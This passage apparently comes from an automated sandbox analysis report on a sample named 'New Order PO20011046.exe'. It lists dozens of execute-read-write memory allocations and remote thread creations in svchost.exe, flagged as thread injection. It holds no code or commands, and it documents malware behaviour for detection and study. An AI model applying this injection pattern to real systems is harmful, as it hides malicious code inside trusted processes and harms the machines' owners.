                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1080000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1090000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 10A0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 10B0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 10C0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 10D0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 10E0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 10F0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1100000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1110000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1120000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1130000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1140000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1150000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1160000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1170000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1180000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1190000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 11A0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 11B0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 11C0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 11D0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 11E0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 11F0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1200000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1210000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1220000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1230000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1240000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1250000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1260000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1270000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1280000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1290000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 12A0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 12B0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 12C0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 12D0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 12E0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 12F0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3310000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3320000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3330000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3340000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3350000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3360000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3370000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3380000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3390000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 33A0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 33B0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 33C0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 33D0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 33E0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 33F0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3410000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3420000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3430000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3440000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3450000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3460000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3470000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3480000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3490000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 34A0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 34B0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 34C0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 34D0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 34E0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 34F0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3500000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3510000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3520000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3530000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3540000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3550000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3560000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3570000 protect: page execute and read and writeJump to behavior
                    Creates a thread in another existing process (thread injection)Show sources
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 460000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 4A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 4E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: B40000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: B80000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: BC0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: C00000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: C40000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: C80000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: CC0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: D00000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: D40000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: D80000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: DC0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: E00000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: E40000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: E80000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: EC0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: F00000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: F40000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: F80000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: FC0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1000000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1040000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1080000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 10C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1100000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1140000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1180000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 11C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1200000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1240000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 1280000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 12C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3310000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3350000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3390000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 33D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3410000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3450000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3490000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 34D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3510000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3550000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3580000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3700000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3740000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 3780000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 37C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 37F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5130000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5170000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 51B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 51E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5260000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 53B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 53F0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5420000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 55A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 55E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5620000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5660000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 56A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 56E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5710000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5890000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 58D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5910000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5950000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5990000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 59D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5A10000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5A50000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5A90000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5AD0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5B10000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5B50000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5B90000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5BD0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5C10000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5C50000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5C90000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5CD0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5D10000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5D50000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5D90000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5DD0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5E10000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5E50000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5E90000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5ED0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5F10000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5F50000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5F90000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 5FD0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6010000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6050000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6090000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 60D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6110000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6150000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6190000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 61D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6200000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6380000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 63C0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6400000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6440000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6480000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 64B0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6630000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6660000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 67E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6820000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6860000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 68A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 68E0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6920000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6960000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 69A0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 69D0000Jump to behavior
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeThread created: C:\Windows\SysWOW64\svchost.exe EIP: 6B50000Jump to behavior
